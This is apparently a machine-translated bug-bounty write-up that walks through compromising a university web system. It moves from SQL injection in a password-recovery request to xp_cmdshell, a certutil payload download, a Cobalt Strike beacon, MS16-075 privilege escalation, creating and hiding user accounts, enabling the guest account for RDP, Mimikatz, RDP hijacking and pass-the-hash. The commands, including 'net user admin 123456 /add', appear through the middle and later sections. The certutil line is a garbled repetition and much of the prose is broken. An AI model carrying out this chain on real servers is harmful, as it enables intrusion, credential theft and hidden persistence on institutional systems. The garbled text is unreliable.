preface
I have been digging EDU SRC for some time, in order to mix several certificates, I have also dug several system pass kill bar in the middle, but the assets are not many, they are black box test out, no technical content. Only this dig to this kill a little bit so a little bit of value, from the Internet web step by step into the final server to lift rights, take down the whole server desktop rights.
This experiment introduces the principle of SQL injection and explains the principle of simply judging whether there is injection for a parameter. It can use simple SQL injection to obtain other sensitive data.
1.Information gathering
Daily wide net digging through killing, routine process, fOFA search keywords, XX university XX system, XX university XX platform, is generally these keywords, or directly search body= “XX company”, XX company must often do development for the school, often are several schools with the same company’s products. And then you found a system like this
I checked the attribution and found that it belongs to some college and educational assets. Through all kinds of grammar and information collection, I found that more than ten schools are using this system. Because there are too many grammars, I searched here casually.
2.Going anywhere
Normal black box test process, look at what language to write, ASP+IIS, very common configuration, EDU in addition to JSP is ASP, rarely see PHP station, IIS station, if the subsequent file upload point, can test IIS resolution vulnerability, the old version of IIS hole or a lot of.
Since it is the station of ASP, then on the royal sword, first to a directory blasting, ASP, ASPX check, 80W large dictionary run,
Over a cup of tea, the catalogue exploded and, sure enough, nothing came out.
In general, in this case, you can change the directory to run, because the whole system may be set up in a specific named directory, here because of time, not run.
Since the directory blasting is not good, this system is open login point, then blasting landing point try, all kinds of user name blasting again
Still failed, a weak password did not blast out, student number, work number blasting have tried, without a success, so far, directory blasting, password blasting all go impassability.
Sql injection, POST injection, general operation, sure enough… Is a piece of red, must do filtering, simple FUzz under THE SQL statement rao around, or failure.
All kinds of operations have come to a wave, what also did not dig, dig edu in this period of time, often encountered this situation, are used to.
Since there is no injection, there is filtering, then test the logic vulnerability, the lower right corner to retrieve the password, I can love to retrieve the password, the password is the high incidence of logical vulnerability, a dozen accurate,
Point in is such a page, quite simple, the more simple, the better to play, decisive input answers, catch the package.
Not much to look at, if the return package is in JSON format, then still have to play. Anyway, I encountered logic vulnerabilities, are front-end verification returned json parameters, change JSON implementation bypass.
3.A silver lining (discover SQL injection)
Sql injection, blasting, weak passwords, logical loopholes are tried, failed, when he was ready to give up, I found that I find the password, he has a characteristics of the system as soon as you enter to find account and then wrap, was it set up problems that column is empty, when you enter the account to wrap, it questions the column automatically validation problems.
So I infer that, after the user to enter the account after wrapping will trigger an action, the action will automatically entered by the user account into the background, from the back end the problem of access to this account, and then displayed on the front end, there must be a process of interaction, data given interaction, so this point there are likely to be injected.
So, you open up burp, you enter your account, you don’t wrap it, you switch to BURp, you capture the packet, you wrap it, you trigger the action, and sure enough, you get a POST packet, and it’s your account
Enter a single quotation mark, found error, there is no doubt that injection, this system ordinary login point card dead, or was found injection, but this injection position is too strange, ordinary people encounter WAF will give up.
MSSQL + DBA =xp_cmdshell –os-shell
4.The BYPASS goes online and the CS is enabled
Certutil. exe -urlcache -split-f: certutil.exe -urlcache -split-f: certutil.exe -urlcache -split-f: certutil.exe -urlcache -split-f: certutil.exe -urlcache -split-f: certutil.exe -urlcache -split-f: certutil.exe -urlcache -split-f: certutil.exe -urlcache -split-f: certutil.exe -urlcache -split-f: certutil.exe -urlcache -split-f: certutil
Mssqlserver user can write files to mSSQLServer user’s desktop directory. Execute CS horse, CS on line!
Although I got the shell, but the permission of this shell is too low, Dumphash reported an error, operation registry will report various errors, anyway, any operation error, because the permission is too low
Now the most urgent is to raise the rights, first implement systemInfo, taskList to see what happens
Server 2012 machine, patch is a bit too many, scary. Tasklist also found no anti-virus software, probably cloud WAF
I tried several MS16-032/016 back and back, and patched them all. The last MS16-075 was patched through and successfully won system permissions. The machine of 2012 is still easy to refer to.
BYpass Remote desktop group To obtain desktop control
Netstat-ano found 3389 port, net User found a bunch of users, here I will not put the picture, otherwise it is too long, simple information collection, start business, the target is desktop control, the magic device Mimikatz, grab the plaintext password. It should be mentioned here that the machine of 2021 can directly obtain the plaintext password by changing the registry. It is found that the administrator logged in in 5.3 last time and did not catch the password, but only hash
Net user admin 123456 /add Create a new user. Create a user admin with password 123456. Remote desktop connection try.
An error occurs: “Connection rejected because this user account is not authorized to log on remotely! The user that I created did not join the remote desktop group, so I could not log in.
Add admin to remote desktop group with net user, still error, I modify the registry to turn off the firewall, RDP rules also release, no result.. I guess it will take effect only after I have modified the configuration and restart it. If I restart it, the system on this server will definitely crash, which is definitely not desirable.
After a long struggle, I realized that the guest user should be in the remote desktop group by default. I just need to activate the guest user, and I can connect to 3389 without rebooting.
User 123456 has been successfully activated
3389 has successfully logged on to the desktop, added a hidden account, and manually added to the remote desktop group
5.RDPHijack failure
If you can’t get the password, you can’t reset the password.
Here I use RDP hijacking, upload a psexec tool, and then get a CMD with system permission, because only the command line with system permission can take over the session
The query user first looks at the session ID (the graph here was truncated when I wrote the article, so the login time is 6-1).
Then run tscon 2 on the command line of the system privilege, and the discovery fails because the last login has been more than three days, and the credentials have expired, and the session cannot be hijacked
6.PTHAttack implementationLogging In using hash
Finally, the administrator’s desktop permissions are obtained through the PTH hash transfer attack, as follows
Mimikatz command:
The desktop looks like this, the MSSQL database management page has not quit
At the end
Sort out the process: 1. Collect information from the extranet – 2. Discover SQL injection – 3. The whole process is not technical, but it is very basic operation, but you can learn a lot. I think it is a very enjoyable process from finding the problem to solving the problem. In addition, Finally got the program source code, after the audit and found a injection and unauthorized into the background, not because of space problem is that the holes have been packaged to submit to the platform, in the end, and you learn this road a long way, hope I can go on, a little less gaudy, steadfast learn is the most important thing, can’t feel learning a little bit of fur is everywhere to show off, Maintain the right amount of humility